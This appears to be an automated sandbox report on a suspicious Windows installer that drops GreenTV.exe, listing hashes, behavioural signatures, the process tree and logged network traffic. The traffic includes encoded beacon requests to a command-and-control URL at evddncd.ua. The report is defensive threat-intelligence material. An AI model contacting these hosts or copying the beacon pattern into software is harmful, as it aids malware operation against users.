Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    144s
  • max time network
    132s
  • platform
    windows10-1703_x64
  • resource
    win10-20231023-en
  • resource tags

    arch:x64arch:x86image:win10-20231023-enlocale:en-usos:windows10-1703-x64system
  • submitted
    27/11/2023, 11:19 UTC

General

  • Target

    50515f3c2af61a9604617c18fec408c6975d71542d8ad15a2742cb011a129c5d.exe

  • Size

    2.7MB

  • MD5

    13c1e6959dd8147d90f9c4864789cd45

  • SHA1

    fcf376e09599a9f3ade51762d7c2b511d5244efb

  • SHA256

    50515f3c2af61a9604617c18fec408c6975d71542d8ad15a2742cb011a129c5d

  • SHA512

    0f3bc0f6924ce65f59259dd92c3bbb59e8b38c430a1ffeef41f029e271120e67f9cae33abeb3a9331b21bab6cd1ab019e61b02b7015f7f7f25bb187c1ac7a59a

  • SSDEEP

    49152:42lZdEspqVE1S0OdJoDYhxQmUJQusk745zZC6FzHDPfRY0E:1jV04OdjMQrk74jXFzDPflE

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 19 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\50515f3c2af61a9604617c18fec408c6975d71542d8ad15a2742cb011a129c5d.exe
    "C:\Users\Admin\AppData\Local\Temp\50515f3c2af61a9604617c18fec408c6975d71542d8ad15a2742cb011a129c5d.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4364
    • C:\Users\Admin\AppData\Local\Temp\is-JFOJ0.tmp\50515f3c2af61a9604617c18fec408c6975d71542d8ad15a2742cb011a129c5d.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-JFOJ0.tmp\50515f3c2af61a9604617c18fec408c6975d71542d8ad15a2742cb011a129c5d.tmp" /SL5="$A01C8,2614569,76288,C:\Users\Admin\AppData\Local\Temp\50515f3c2af61a9604617c18fec408c6975d71542d8ad15a2742cb011a129c5d.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      PID:2760
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /Query
        3⤵
          PID:4544
        • C:\Program Files (x86)\Common Files\GreenTV\GreenTV.exe
          "C:\Program Files (x86)\Common Files\GreenTV\GreenTV.exe" -i
          3⤵
          • Executes dropped EXE
          PID:2916
        • C:\Program Files (x86)\Common Files\GreenTV\GreenTV.exe
          "C:\Program Files (x86)\Common Files\GreenTV\GreenTV.exe" -s
          3⤵
          • Executes dropped EXE
          PID:3228
        • C:\Windows\SysWOW64\net.exe
          "C:\Windows\system32\net.exe" helpmsg 25
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4760
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 helpmsg 25
            4⤵
              PID:1608

      Network

      • flag-us
        DNS
        0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
        Remote address:
        8.8.8.8:53
        Request
        0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
        IN PTR
        Response
      • flag-de
        DNS
        evddncd.ua
        GreenTV.exe
        Remote address:
        45.155.250.90:53
        Request
        evddncd.ua
        IN A
        Response
        evddncd.ua
        IN A
        69.30.233.162
      • flag-us
        GET
        http://evddncd.ua/fox.php?c=de7ef49b2c006853fb383d756350f51562f81905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439d40c87a0c922e9d59869d39226a40b4757736ce967179ccd0d6345d528edb0efd11cbd9
        GreenTV.exe
        Remote address:
        69.30.233.162:80
        Request
        GET /fox.php?c=de7ef49b2c006853fb383d756350f51562f81905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439d40c87a0c922e9d59869d39226a40b4757736ce967179ccd0d6345d528edb0efd11cbd9 HTTP/1.1
        Host: evddncd.ua
        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.20.1
        Date: Mon, 27 Nov 2023 11:21:52 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Vary: Accept-Encoding
      • flag-us
        GET
        http://evddncd.ua/fox.php?c=de7ef49b2c006853fb383d756350f51562f81905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955eea4beea4a21bca13c034048571c054999c22227242a7212671d5c330698588cd611e0b82da01f910ced158b3233f
        GreenTV.exe
        Remote address:
        69.30.233.162:80
        Request
        GET /fox.php?c=de7ef49b2c006853fb383d756350f51562f81905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955eea4beea4a21bca13c034048571c054999c22227242a7212671d5c330698588cd611e0b82da01f910ced158b3233f HTTP/1.1
        Host: evddncd.ua
        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.20.1
        Date: Mon, 27 Nov 2023 11:21:54 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Vary: Accept-Encoding
      • flag-us
        DNS
        0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.a.5.a.f.b.9.d.2.ip6.arpa
        Remote address:
        8.8.8.8:53
        Request
        0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.a.5.a.f.b.9.d.2.ip6.arpa
        IN PTR
        Response
      • flag-us
        DNS
        168.117.168.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        168.117.168.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        162.233.30.69.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        162.233.30.69.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        122.253.30.69.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        122.253.30.69.in-addr.arpa
        IN PTR
        Response
      • 69.30.233.162:80
        http://evddncd.ua/fox.php?c=de7ef49b2c006853fb383d756350f51562f81905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955eea4beea4a21bca13c034048571c054999c22227242a7212671d5c330698588cd611e0b82da01f910ced158b3233f
        http
        GreenTV.exe
        860 B
        956 B
        6
        5

        HTTP Request

        GET http://evddncd.ua/fox.php?c=de7ef49b2c006853fb383d756350f51562f81905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439d40c87a0c922e9d59869d39226a40b4757736ce967179ccd0d6345d528edb0efd11cbd9

        HTTP Response

        200

        HTTP Request

        GET http://evddncd.ua/fox.php?c=de7ef49b2c006853fb383d756350f51562f81905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955eea4beea4a21bca13c034048571c054999c22227242a7212671d5c330698588cd611e0b82da01f910ced158b3233f

        HTTP Response

        200
      • 69.30.253.122:1074
        GreenTV.exe
        309 B
        174 B
        5
        4
      • 8.8.8.8:53
        0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
        dns
        118 B
        182 B
        1
        1

        DNS Request

        0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

      • 45.155.250.90:53
        evddncd.ua
        dns
        GreenTV.exe
        56 B
        82 B
        1
        1

        DNS Request

        evddncd.ua

        DNS Response

        69.30.233.162

      • 8.8.8.8:53
        0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.a.5.a.f.b.9.d.2.ip6.arpa
        dns
        118 B
        182 B
        1
        1

        DNS Request

        0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.a.5.a.f.b.9.d.2.ip6.arpa

      • 8.8.8.8:53
        168.117.168.52.in-addr.arpa
        dns
        73 B
        147 B
        1
        1

        DNS Request

        168.117.168.52.in-addr.arpa

      • 8.8.8.8:53
        162.233.30.69.in-addr.arpa
        dns
        72 B
        135 B
        1
        1

        DNS Request

        162.233.30.69.in-addr.arpa

      • 8.8.8.8:53
        122.253.30.69.in-addr.arpa
        dns
        72 B
        135 B
        1
        1

        DNS Request

        122.253.30.69.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Program Files (x86)\Common Files\GreenTV\GreenTV.exe

        Filesize

        2.2MB

        MD5

        e67657e2650ed285bf43a6571c494339

        SHA1

        545301f496ea411826cf4276e1fe58a70cb7c325

        SHA256

        7fcd0fe091190cffe59153897b0411724823e4cd09bf282eda9ddd5fcd2dfda5

        SHA512

        7fdaceffa1171357214f5ee524bbcac3d09efd22c2a9137858e7c817d6dd609bec3a1827c80d97728a40548c02f803794d3d548bdb1409e06fee3b4958e3a89d

      • C:\Program Files (x86)\Common Files\GreenTV\GreenTV.exe

        Filesize

        2.2MB

        MD5

        e67657e2650ed285bf43a6571c494339

        SHA1

        545301f496ea411826cf4276e1fe58a70cb7c325

        SHA256

        7fcd0fe091190cffe59153897b0411724823e4cd09bf282eda9ddd5fcd2dfda5

        SHA512

        7fdaceffa1171357214f5ee524bbcac3d09efd22c2a9137858e7c817d6dd609bec3a1827c80d97728a40548c02f803794d3d548bdb1409e06fee3b4958e3a89d

      • C:\Program Files (x86)\Common Files\GreenTV\GreenTV.exe

        Filesize

        2.2MB

        MD5

        e67657e2650ed285bf43a6571c494339

        SHA1

        545301f496ea411826cf4276e1fe58a70cb7c325

        SHA256

        7fcd0fe091190cffe59153897b0411724823e4cd09bf282eda9ddd5fcd2dfda5

        SHA512

        7fdaceffa1171357214f5ee524bbcac3d09efd22c2a9137858e7c817d6dd609bec3a1827c80d97728a40548c02f803794d3d548bdb1409e06fee3b4958e3a89d

      • C:\Users\Admin\AppData\Local\Temp\is-JFOJ0.tmp\50515f3c2af61a9604617c18fec408c6975d71542d8ad15a2742cb011a129c5d.tmp

        Filesize

        683KB

        MD5

        f507ce43ea08d1721816ad4b0e090f50

        SHA1

        e4f02bcd410bddabea4c741838d9a88386547629

        SHA256

        d2218bde27d66f28e3caf15e899653a9357ebdc7adf9a763b687f6c03c93e5e1

        SHA512

        37b2f92df632f75447572df840a236ef01021e8291536bf2e8156179333f770afdd8bcbf50cb05bbdbdaa53c00ace46119290800b115823ea035a2389a3f6693

      • C:\Users\Admin\AppData\Local\Temp\is-JFOJ0.tmp\50515f3c2af61a9604617c18fec408c6975d71542d8ad15a2742cb011a129c5d.tmp

        Filesize

        683KB

        MD5

        f507ce43ea08d1721816ad4b0e090f50

        SHA1

        e4f02bcd410bddabea4c741838d9a88386547629

        SHA256

        d2218bde27d66f28e3caf15e899653a9357ebdc7adf9a763b687f6c03c93e5e1

        SHA512

        37b2f92df632f75447572df840a236ef01021e8291536bf2e8156179333f770afdd8bcbf50cb05bbdbdaa53c00ace46119290800b115823ea035a2389a3f6693

      • \Users\Admin\AppData\Local\Temp\is-SRD5C.tmp\_isetup\_iscrypt.dll

        Filesize

        2KB

        MD5

        a69559718ab506675e907fe49deb71e9

        SHA1

        bc8f404ffdb1960b50c12ff9413c893b56f2e36f

        SHA256

        2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

        SHA512

        e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

      • \Users\Admin\AppData\Local\Temp\is-SRD5C.tmp\_isetup\_isdecmp.dll

        Filesize

        32KB

        MD5

        b6f11a0ab7715f570f45900a1fe84732

        SHA1

        77b1201e535445af5ea94c1b03c0a1c34d67a77b

        SHA256

        e47dd306a9854599f02bc1b07ca6dfbd5220f8a1352faa9616d1a327de0bbf67

        SHA512

        78a757e67d21eb7cc95954df15e3eeff56113d6b40fb73f0c5f53304265cc52c79125d6f1b3655b64f9a411711b5b70f746080d708d7c222f4e65bad64b1b771

      • \Users\Admin\AppData\Local\Temp\is-SRD5C.tmp\_isetup\_isdecmp.dll

        Filesize

        32KB

        MD5

        b6f11a0ab7715f570f45900a1fe84732

        SHA1

        77b1201e535445af5ea94c1b03c0a1c34d67a77b

        SHA256

        e47dd306a9854599f02bc1b07ca6dfbd5220f8a1352faa9616d1a327de0bbf67

        SHA512

        78a757e67d21eb7cc95954df15e3eeff56113d6b40fb73f0c5f53304265cc52c79125d6f1b3655b64f9a411711b5b70f746080d708d7c222f4e65bad64b1b771

      • memory/2760-69-0x0000000000400000-0x00000000004BA000-memory.dmp

        Filesize

        744KB

      • memory/2760-9-0x00000000001F0000-0x00000000001F1000-memory.dmp

        Filesize

        4KB

      • memory/2760-71-0x00000000001F0000-0x00000000001F1000-memory.dmp

        Filesize

        4KB

      • memory/2916-59-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/2916-60-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/2916-64-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-74-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-93-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-70-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-67-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-118-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-75-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-78-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-81-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-84-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-88-0x0000000000910000-0x00000000009BD000-memory.dmp

        Filesize

        692KB

      • memory/3228-87-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-115-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-96-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-97-0x0000000000910000-0x00000000009BD000-memory.dmp

        Filesize

        692KB

      • memory/3228-100-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-103-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-106-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/3228-109-0x0000000000910000-0x00000000009BD000-memory.dmp

        Filesize

        692KB

      • memory/3228-110-0x0000000000910000-0x00000000009BD000-memory.dmp

        Filesize

        692KB

      • memory/3228-111-0x0000000000400000-0x0000000000637000-memory.dmp

        Filesize

        2.2MB

      • memory/4364-68-0x0000000000400000-0x000000000041A000-memory.dmp

        Filesize

        104KB

      • memory/4364-0-0x0000000000400000-0x000000000041A000-memory.dmp

        Filesize

        104KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.